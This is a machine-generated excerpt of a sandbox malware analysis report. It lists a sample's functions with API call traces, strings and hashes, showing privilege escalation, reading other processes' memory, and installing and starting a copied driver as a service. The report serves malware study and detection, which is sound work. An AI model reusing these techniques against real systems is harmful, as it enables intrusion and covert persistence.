                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strncpy
                                                                                                                                      • String ID: 11948$11965$24624$24647$c3b39858cd5cd.zip$da1b4f0857d.zip$ded12271319.zip$j9a03b4151b3e00ffc9.zip$loser.rar$loser32.rar$loser64.rar$loser64_2.rar
                                                                                                                                      • API String ID: 2961919466-1613592718
                                                                                                                                      • Opcode ID: 48672033616b2221a37db8a067711ab126adaefe49622c5d6e8cff9ae30ea7ee
                                                                                                                                      • Instruction ID: e95403ad67624be9fbbd162adf39e61deb3346db40c20f8df494fb1e9c701a92
                                                                                                                                      • Opcode Fuzzy Hash: 48672033616b2221a37db8a067711ab126adaefe49622c5d6e8cff9ae30ea7ee
                                                                                                                                      • Instruction Fuzzy Hash: 91316C66604A127BC3019A647F05BEB3B9D9F4031CF349259EC689B386FB30DA0A86D1
                                                                                                                                      Function 69E881A0 Relevance: 28.1, APIs: 4, Strings: 12, Instructions: 120COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: _strncpy
                                                                                                                                      • String ID: 11948$11965$24624$24647$c3b39858cd5cd.zip$da1b4f0857d.zip$ded12271319.zip$j9a03b4151b3e00ffc9.zip$loser.rar$loser32.rar$loser64.rar$loser64_2.rar
                                                                                                                                      • API String ID: 2961919466-1613592718
                                                                                                                                      • Opcode ID: e69dcb4484b238326b9e081f2091b5cd7164984f61ab616858460c962ab4eebd
                                                                                                                                      • Instruction ID: 104ca6a56b01447565f692f300e367a4baf27a2b53f0706ad4c9bed140ab3084
                                                                                                                                      • Opcode Fuzzy Hash: e69dcb4484b238326b9e081f2091b5cd7164984f61ab616858460c962ab4eebd
                                                                                                                                      • Instruction Fuzzy Hash: 29316B69604A127BC30196646F05BAB3B9D9F8131CF349258EC689F346FB30EA0A82D1
                                                                                                                                      Function 69EB6CBC Relevance: 28.1, APIs: 8, Strings: 8, Instructions: 78libraryloaderCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,76944A40,69EB6E11,?,?,?,?,?,?,?,69EB8BFF,00000000,00000002,00000028), ref: 69EB6CE7
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetSystemMetrics), ref: 69EB6D03
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromWindow), ref: 69EB6D14
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromRect), ref: 69EB6D25
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,MonitorFromPoint), ref: 69EB6D36
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayMonitors), ref: 69EB6D47
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,GetMonitorInfoA), ref: 69EB6D58
                                                                                                                                      • GetProcAddress.KERNEL32(00000000,EnumDisplayDevicesA), ref: 69EB6D69
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: AddressProc$HandleModule
                                                                                                                                      • String ID: EnumDisplayDevicesA$EnumDisplayMonitors$GetMonitorInfoA$GetSystemMetrics$MonitorFromPoint$MonitorFromRect$MonitorFromWindow$USER32
                                                                                                                                      • API String ID: 667068680-68207542
                                                                                                                                      • Opcode ID: 34a9f52dd59535710930ad7c18370a2e91fc327db5b8f73943193afe56c0571b
                                                                                                                                      • Instruction ID: 6437dabdb8725e73aa18d9f4ec554494a00c22c0b05464d652f4eabc235803c3
                                                                                                                                      • Opcode Fuzzy Hash: 34a9f52dd59535710930ad7c18370a2e91fc327db5b8f73943193afe56c0571b
                                                                                                                                      • Instruction Fuzzy Hash: EC213BF1D102D8DFCB12AFF6A9C852D7AA9B3CAA25364853FD005D7208F73540458F01
                                                                                                                                      Function 69E8A860 Relevance: 26.4, APIs: 13, Strings: 2, Instructions: 197COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E8A8C8
                                                                                                                                      • _memset.LIBCMT ref: 69E8A8E5
                                                                                                                                      • _malloc.LIBCMT ref: 69E8A8F2
                                                                                                                                        • Part of subcall function 69EBED6C: __FF_MSGBANNER.LIBCMT ref: 69EBED8F
                                                                                                                                        • Part of subcall function 69EBED6C: __NMSG_WRITE.LIBCMT ref: 69EBED96
                                                                                                                                        • Part of subcall function 69EBED6C: RtlAllocateHeap.NTDLL(00000000,?,00000001,00000000,00000000,?,69EC8DFF,?,00000001,?,?,69EC7CE7,00000018,69EE8F08,0000000C,69EC7D78), ref: 69EBEDE3
                                                                                                                                      • OutputDebugStringA.KERNEL32(malloc failed!), ref: 69E8A909
                                                                                                                                      • _memset.LIBCMT ref: 69E8A91B
                                                                                                                                      • _memset.LIBCMT ref: 69E8A990
                                                                                                                                      • _strncpy.LIBCMT ref: 69E8A9D7
                                                                                                                                      • inet_addr.WS2_32(?), ref: 69E8AA07
                                                                                                                                      • EnterCriticalSection.KERNEL32(69EF2C98), ref: 69E8AA4E
                                                                                                                                      • LeaveCriticalSection.KERNEL32(69EF2C98), ref: 69E8AA5E
                                                                                                                                      • SetEvent.KERNEL32(?), ref: 69E8AA98
                                                                                                                                      • EnterCriticalSection.KERNEL32(69EF2C98), ref: 69E8AAEE
                                                                                                                                      • LeaveCriticalSection.KERNEL32(69EF2C98), ref: 69E8AAFE
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: CriticalSection_memset$EnterLeave$AllocateDebugEventHeapOutputString_malloc_strncpyinet_addr
                                                                                                                                      • String ID: P$malloc failed!
                                                                                                                                      • API String ID: 2668965645-1356752661
                                                                                                                                      • Opcode ID: 06ce128ed1eb8f64cfda47b7a8160d9159e7a67bb07abd4e45540576da4bab7b
                                                                                                                                      • Instruction ID: b1257cbd6b587c2274aabe03f67d37bbc0ee259233e565302a5b172fc0d89707
                                                                                                                                      • Opcode Fuzzy Hash: 06ce128ed1eb8f64cfda47b7a8160d9159e7a67bb07abd4e45540576da4bab7b
                                                                                                                                      • Instruction Fuzzy Hash: 0E7129B59483409FC711CF64CA84A9FB7E8FF85314F204A1EF8A997380D774A949CB92
                                                                                                                                      Function 69EA2260 Relevance: 26.4, APIs: 7, Strings: 8, Instructions: 151COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • _memset.LIBCMT ref: 69EA22B2
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA22FF
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00500000,00000031,00040000,pK), ref: 69EA2343
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,005F0000,00000031,00040000,pK), ref: 69EA237E
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00620000,00000031,00040000,pK), ref: 69EA23B5
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00660000,00000031,00040000,pK), ref: 69EA23EC
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA2414
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Memory$Process$Read$Virtual$AllocateInformationOpenQuerySystem$AdjustCloseFreeHandlePrivilege_memset
                                                                                                                                      • String ID: .$1$2$M$c$m$o$pK
                                                                                                                                      • API String ID: 3326258801-2780825013
                                                                                                                                      • Opcode ID: a5ca25ac131dd03c43472a9734f1d763cc1ba0b3f3091bbf13bce721716e552a
                                                                                                                                      • Instruction ID: 2f985cda2080cadc1619e6c01570bfc1c14a5e1af285565bf71d30a75ed9accb
                                                                                                                                      • Opcode Fuzzy Hash: a5ca25ac131dd03c43472a9734f1d763cc1ba0b3f3091bbf13bce721716e552a
                                                                                                                                      • Instruction Fuzzy Hash: DB5104725083419AD300CA64DC40FAF77D8AF9931CF144A2DF698AA291E774EA0D87B7
                                                                                                                                      Function 69EB8B0F Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 175windowCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69EBBBC3: GetWindowLongA.USER32(?,000000F0), ref: 69EBBBCE
                                                                                                                                      • GetParent.USER32(?), ref: 69EB8B3E
                                                                                                                                      • SendMessageA.USER32(00000000,0000036B,00000000,00000000), ref: 69EB8B61
                                                                                                                                      • GetWindowRect.USER32(?,?), ref: 69EB8B7B
                                                                                                                                      • GetWindowLongA.USER32(00000000,000000F0), ref: 69EB8B91
                                                                                                                                      • CopyRect.USER32(?,?), ref: 69EB8BDE
                                                                                                                                      • CopyRect.USER32(?,?), ref: 69EB8BE8
                                                                                                                                      • GetWindowRect.USER32(00000000,?), ref: 69EB8BF1
                                                                                                                                      • CopyRect.USER32(?,?), ref: 69EB8C0D
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Rect$Window$Copy$Long$MessageParentSend
                                                                                                                                      • String ID: (
                                                                                                                                      • API String ID: 808654186-3887548279
                                                                                                                                      • Opcode ID: 749bb28cfc9b1dba69dd6b056aadcc7236fd00df0ae10e00b8723d96308784a3
                                                                                                                                      • Instruction ID: 6d178f3574efcfcb2f2cc4b451d2b39d6127966913566e8afe0418dee272b386
                                                                                                                                      • Opcode Fuzzy Hash: 749bb28cfc9b1dba69dd6b056aadcc7236fd00df0ae10e00b8723d96308784a3
                                                                                                                                      • Instruction Fuzzy Hash: 6C515F7690021AAFDB01CFB8CE85EEEBBB9BF48314F254115E915F7294DB30E9458B60
                                                                                                                                      Function 69E87A04 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 118servicefileCOMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                      • _memset.LIBCMT ref: 69E87A38
                                                                                                                                      • _memset.LIBCMT ref: 69E87A52
                                                                                                                                      • _memset.LIBCMT ref: 69E87A6C
                                                                                                                                      • GetWindowsDirectoryA.KERNEL32(?,00000104), ref: 69E87A8A
                                                                                                                                      • wsprintfA.USER32 ref: 69E87AA8
                                                                                                                                      • CopyFileA.KERNEL32(C:\Windows\System32\drivers\wimmount.sys,?,00000000), ref: 69E87AC0
                                                                                                                                      • OpenSCManagerA.ADVAPI32(00000000,00000000,000F003F), ref: 69E87AD7
                                                                                                                                        • Part of subcall function 69E87980: CreateServiceA.ADVAPI32(00000000,?,?,000F01FF,00000001,00000001,00000001,?,00000000,00000000,00000000,00000000,00000000,69E87AF9), ref: 69E87999
                                                                                                                                        • Part of subcall function 69E87980: GetLastError.KERNEL32 ref: 69E879A3
                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 69E87B72
                                                                                                                                        • Part of subcall function 69E87430: _memset.LIBCMT ref: 69E87469
                                                                                                                                        • Part of subcall function 69E87430: _strncpy.LIBCMT ref: 69E87486
                                                                                                                                      • OpenServiceA.ADVAPI32(00000000,?,000F01FF), ref: 69E87B32
                                                                                                                                      • StartServiceA.ADVAPI32(00000000,00000000,00000000), ref: 69E87B47
                                                                                                                                      • GetLastError.KERNEL32 ref: 69E87B51
                                                                                                                                      • CloseServiceHandle.ADVAPI32(00000000), ref: 69E87B66
                                                                                                                                      Strings
                                                                                                                                      • C:\Windows\System32\drivers\wimmount.sys, xrefs: 69E87ABB
                                                                                                                                      • %s\SysWOW64\%s.sys, xrefs: 69E87AA2
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797638432.0000000069F45000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797741855.0000000069F4A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797786351.0000000069F4B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798016442.0000000069F5A000.00000040.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798062740.0000000069F5B000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4798104542.0000000069F5C000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                      • Snapshot File: hcaresult_2_2_69e80000_DC1FFAF.jbxd
                                                                                                                                      Similarity
                                                                                                                                      • API ID: Service$_memset$CloseErrorHandleLastOpen$CopyCreateDirectoryFileManagerStartWindows_strncpywsprintf
                                                                                                                                      • String ID: %s\SysWOW64\%s.sys$C:\Windows\System32\drivers\wimmount.sys
                                                                                                                                      • API String ID: 3689075865-1479437390
                                                                                                                                      • Opcode ID: 5a47fffb9f46621371da109d0c17fab23136852153a5d886bf75c96034d3a7ae
                                                                                                                                      • Instruction ID: 0a8d1c4897b08c1a8f3a10cfd09042c5a7a8483319bb3992fd02fdb149447cae
                                                                                                                                      • Opcode Fuzzy Hash: 5a47fffb9f46621371da109d0c17fab23136852153a5d886bf75c96034d3a7ae
                                                                                                                                      • Instruction Fuzzy Hash: A941E575748340ABE721DB709E85FAF73AEAF85344F10481DF65D82241EB75D5088BA2
                                                                                                                                      Function 69EA1940 Relevance: 22.9, APIs: 4, Strings: 9, Instructions: 143COMMON
                                                                                                                                      Download Yara Rule
                                                                                                                                      APIs
                                                                                                                                        • Part of subcall function 69E9CCF0: RtlAdjustPrivilege.NTDLL ref: 69E9CD1C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD5C
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwOpenProcess.NTDLL(00010000,001FFFFF,?,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CD7F
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDA7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDC0
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwFreeVirtualMemory.NTDLL(000000FF,00000014,00000014,00008000,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CDD7
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwAllocateVirtualMemory.NTDLL(000000FF,?,00000000,?,00001000,00000004,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE00
                                                                                                                                        • Part of subcall function 69E9CCF0: ZwQuerySystemInformation.NTDLL(00000010,00000000,00000001,?,?,?,?,?,00010000,001FFFFF,?,?), ref: 69E9CE13
                                                                                                                                      • ReadProcessMemory.KERNEL32 ref: 69EA1A03
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,00471CDC,isre,00000012,00471844), ref: 69EA1A4C
                                                                                                                                      • ReadProcessMemory.KERNEL32(00000000,0047430C,isre,00000012,00471844), ref: 69EA1A94
                                                                                                                                      • CloseHandle.KERNEL32(00000000), ref: 69EA1ACF
                                                                                                                                      Strings
                                                                                                                                      Memory Dump Source
                                                                                                                                      • Source File: 00000002.00000002.4794015728.0000000069E81000.00000020.00000001.01000000.00000012.sdmp, Offset: 69E80000, based on PE: true
                                                                                                                                      • Associated: 00000002.00000002.4793863028.0000000069E80000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4795599242.0000000069EDA000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EED000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF1000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796098916.0000000069EF6000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796417453.0000000069EF8000.00000020.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4796635921.0000000069F04000.00000080.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                      • Associated: 00000002.00000002.4797586711.0000000069F44000.00000040.00000001.01000000.00000012.sdmpDownload File
